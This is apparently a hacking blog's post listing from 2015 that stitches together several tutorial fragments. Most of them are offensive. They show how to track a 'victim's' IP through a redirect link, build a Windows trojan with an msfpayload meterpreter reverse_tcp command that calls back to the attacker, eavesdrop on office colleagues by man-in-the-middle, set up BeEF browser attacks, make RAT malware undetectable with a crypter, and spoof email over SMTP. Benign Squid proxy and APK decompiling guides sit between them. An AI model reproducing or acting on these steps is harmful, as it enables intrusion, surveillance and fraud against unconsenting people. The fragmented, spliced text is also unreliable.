Go to this site
http://blasze.tk
and enter a URL to redirect the victim. Then you will receive a code to track the IP of the victim's. Use the code to get the IP of the Victim.
Saturday, May 30, 2015
Friday, May 29, 2015
How to make a Squid server and apply Rules
Proxy servers operate as an intermediary between a local network and Internet. Requests from local clients for web services can be handled by the proxy server. Squid is a high-performance HTTP and FTP caching proxy server. It is also known as a Web proxy cache. As it stores data from frequently used Web pages and files, it can often give your users the data they need without their systems having to look to the Internet.
So let's begin the tutorial.
Firstly we should install the squid in our linux system.
It's different from each linux dist but here i will get the ubuntu OS for example. And there is no more difference on these steps just browse over internet to know how to install squid to your linux OS.
Ok get the terminal and type
apt-get install squid3
As i said this is for ubuntu. apt-get install will remains as same in other Linux OSs. But dunno about squid.
Then we have to set a static IP to our server. Go to System Settings and Networks. You can change the IP, Gateway, DNS there without bothering of the commands in the terminal.
To check surely the Squid has installed in the system go to etc folder in file system or root. Try to find something like squid. In this case it's "squid3".
Go to the terminal and type
sudo nano /etc/squid3/squid.conf
Using this command we are going to open the squid.conf with nano for editing purpose.
Then you will see a more than 5000 lines of doc in there.
press ctrl+w and searching menu will appear. type visible_hostname. It will go to the point that phrase exist and when you slowly scroll down you will see under the default: , after the visible_hostname localhost or something. Give it a desired name or it's better to use your machine host name (type in the terminal hostname and enter.)
Again press ctrl+w and type to search tag: acl.
now we are going to build access control list. In this scenario i'm going to do this.
- block internet to 192.168.100.250
- allow internet to all of other network users
- but block www.facebook.com for every user
So lets we write a ACL to achieve these settings
scroll down after pointing the tag: acl. after default: you will see there is a acl as "acl all src all".This is default. Now i'm gonna write following ACLs.
acl deny_host src 192.168.100.250
acl allow_network src 192.168.100.0/24
acl deny_web dstdomain "/etc/squid3/deny_web"
acl all src all - this is default one
src=source dst=destination dstdomain=destination domain
This is how we write acl to achieve above internet filtering. In the last acl we have open a acl called "deny_web" and we suggest it to look for certain destination domains where in /etc/squid3/deny_web. This was not in that folder but we are creating this to add the domains that we want to block. When you go to that directory you can see deny_web.conf file has there.
Are we done???
no we have to assign those ACLs to http access list. In acl list we are only saying to the squid "hey squid you are going inspect on these elements with these parameters". How we say to squid "don't allow these elements but you should allow these eliments through you". This is how it's gonna happen.
again ctrl+w search for tag: http_access. scroll down and after default: you will see there already an access rule saying http_access deny all. Remember this is the most important part. You should aware about this allow and deny. keep the http_access deny all at the bottom every time. It should be there. Or else there should be allow all. But if we want to permit only trusted connections and we want to abort all others deny all is huge privilege. Remember, squid read this rules top to bottom. So top one gets high priority.I will say you a simple trick to get easy with these rules.
Let assume you are in a position which is all post cards from your country(let say US) inspected by you. You got a following list to filter out the post cards.
- Deny post cards from New York.
- Deny post cards to new delhi in India
- Allow post cards from America
- Deny any
Let's say accidentally you got a post card that has "from: Ottawa,Canada to: colombo,sri lanka
ok you look at the list will see is it from new york? no.Is it to delhi in India? no. Is it from America? no. Then you see deny any. So you drop the post card. Let's say you are getting post card "from : Virginia,America to : Delhi,India". So you look at the list...Is it from New york? no. Is it to Delhi in India? oops.yes. it is. So you drop it. Because it says deny post cards to New Delhi in India. The important thing is you are not going to look at the third rule. "Allow post cards from America". Because you give high priority for top rules. Is it from America? yes it is. But it was not in the top of the other rules. So now you have dropped it. The Squid server (and most of ACLs) following like this method. It's agree with the first rule that's gonna be "true" with the situation by looking IP addresses, domain names, ports and other things inside the request packets and it will pass through it or block.
So let's make the Http_access list
http_access deny deny_host
http_access deny deny_web
http_access allow allow_network
http_access deny all
ok now you finish.
press ctrl+x and ask are you sure to save this changes. Give Y and press enter.
Now you should input what sites are going to block under the deny_web acl. To do that get the terminal and type sudo nano /etc/squid3/deny_web
then enter the web site to block. As to our example www.facebook.com. Type it and ctrl+x press y to save and press enter.
now you are done. Go to client machines and go to Internet Properties > Connections > LAN Settings . Tick "Use a proxy server for your LAN" and enter the IP of the server. And the port you can find go to server get the terminal and type nano /etc/squid3/squid.conf and ctrl+w , search for http_port.
There you will see what port squid is listening. Enter that port on the port: text box of proxy settings of the client machine. So check it out.
There you will see what port squid is listening. Enter that port on the port: text box of proxy settings of the client machine. So check it out.
Thursday, May 28, 2015
Hack Windows machines using a trojan made by Kali
Hack Any Windows 7 With Metasploit
In this tutorial I will exploit a Windows 7 Sp1 OS using Metasploit. I will be using the exploit/multi/handler module which “provides all of the features of the Metasploit payload system to exploits that have been launched outside of the framework“
Before we fire up Metasploit, we need to create a payload in order to gain a meterpreter shell. To create a payload type this in the terminal without the quotes:
msfpayload windows/meterpreter/reverse_tcp LHOST=”your Local IP” LPORT=”listening port” x > /root/backdoor.exe
I used port 4444 (you can choose your own port) for the LPORT which is the listening port and set the LHOST to the IP of the remote attacker which is obviously your Local IP address, my IP is 192.168.10.5.
How to look what's browsing your colleague (Man in the middle attack)
How about you can eavesdrop what are your office colleagues browsing on Internet...
To do this we are using basically 2 tools in kali.
- Ettercap
- Xplico
Xplico is not coming inbuilt manner in kali. In Back track it's in-built. For kali you have to install it. So to do it follow..
type in Terminal,,,
apt-get update
apt-get install xplico
Now go to Application > kali linux > Information Gathering > Traffic Analysis
There you will see "Xplico" , "Xplico start" , "Xplico stop"
To start Xplico firstly you have to start Apache2
Tuesday, May 26, 2015
APK decompile and recompile
Go to this site to download the relevant tools.
http://forum.xda-developers.com/showthread.php?t=2251719
download the full Apktool & baksmali/smali + Signer for all GB/ICS/JB/KK ROM v3 (4.4 Kitkat support/optimized)
to recompile the edited apk folder content...get cmd and type
http://forum.xda-developers.com/showthread.php?t=2251719
download the full Apktool & baksmali/smali + Signer for all GB/ICS/JB/KK ROM v3 (4.4 Kitkat support/optimized)
- extract it to a desired folder.
- download the framework-res.apk and copy it to the same place that extracted.
- And also copy paste the .apk file.
- shift+right click on the window.
- click open command window here.
- cmd will open now.
- type on cmd apktool if framework-res.apk
- then type apktool d "your apk file name"
- press enter, it will have been decompiled and there will be a new folder which contains the decompiled files.
to recompile the edited apk folder content...get cmd and type
- apktool b -f -d "your apk file name"
- go to the folder that contents have of the real apk (decompiled) and go to the dist folder. There will have the apk file.
Browser attacks using BeEf
To this browser attack gonna use not only the Beef but also Metasploit.
Open shell, type and go as follows..
cd /usr/share/beef-xss
ls
in the list you can see config.yaml file. Copy the name and paste the name after nano.
nano config.yaml
scroll down and look at "metasploit enable : false"
you have to erase the "false" and make it "true"
then its looks like enable : true
press ctrl + x
type y
press enter
continue typing
Hiding Malware from the Anti-virus
Creating Malware
You can create the malware for this test using the Apocalypse RAT. It's easy to build RATs. Don't need to explain how you will know after download it.Crypters
Normally to made the malware undetectable crypters are used. but the case is when a crypter is built by programmer and when it's getting to use over the world, it becomes popular and anti-virus system getting the signatures of its and the files created using that crypter will detected by anti-virus systems. So a crypter which popular will not survive for a long.FUD (Fully UnDetectable) manner.So what we gonna do
There is a crypter called "Aegis crypter". The important of this crypter is it's updating the stubs and also there are numerous features using to bypass the anti-virus. So this gonna be a greate crypter for creating FUD malwares.It can download here.
Thursday, May 21, 2015
How to spoof Email address
What is Email spoofing..
Email spoofing is send an email to a specific recipient as it was sent FROM a different person's email address. If i want to send a fake mail to sample1@email.com as it was sent from sample2@email.com , this technique becomes handy.
Try this in your office.
Step 1
Open cmd and telnet your mail server with your outgoing mail port. Mostly the outgoing mail port should be 25 (SMTP port).
ex:
If the email to be spoofed is in the mail server on mail.office.com and it's outgoing mail port is 25 type as follows on cmd
telnet mail.office.com 25
and enter.
Wednesday, May 20, 2015
Obfuscation: Malware’s best friend
Here at Malwarebytes, we see a
lot of malware. Whether it’s a botnet used to attack web servers or a
ransomware stealing your files, much of today’s malware wants to stay hidden
during infection and operation to prevent removal and analysis. Malware
achieves this using many techniques to thwart detection and analysis—some
examples of these include using obscure filenames, modifying file attributes,
or operating under the pretense of legitimate programs and services. In more
advanced cases, the malware might attempt to subvert modern detection software
(i.e. MBAM) to prevent being found, hiding running processes and network
connections. The possibilities are quite endless.
Despite advances in modern
malware, dirty programs can’t hide forever. When malware is found, it
needs some additional layers of defense to protect itself from analysis and
reverse engineering. By implementing additional protection mechanisms,
malware can be more difficult to detect and even more resilient to
takedown. Although a lot of tricks are used to hide malware’s internals,
a technique used in nearly every malware is binary obfuscation.
Obfuscation (in the context of software) is a technique that
makes binary and textual data unreadable and/or hard to understand.
Software developers sometimes employ obfuscation techniques because they don’t
want their programs being reverse-engineered or pirated.
Monday, May 18, 2015
What Is A Programmable Logic Controller (PLC)?
|
Subscribe to:
Posts (Atom)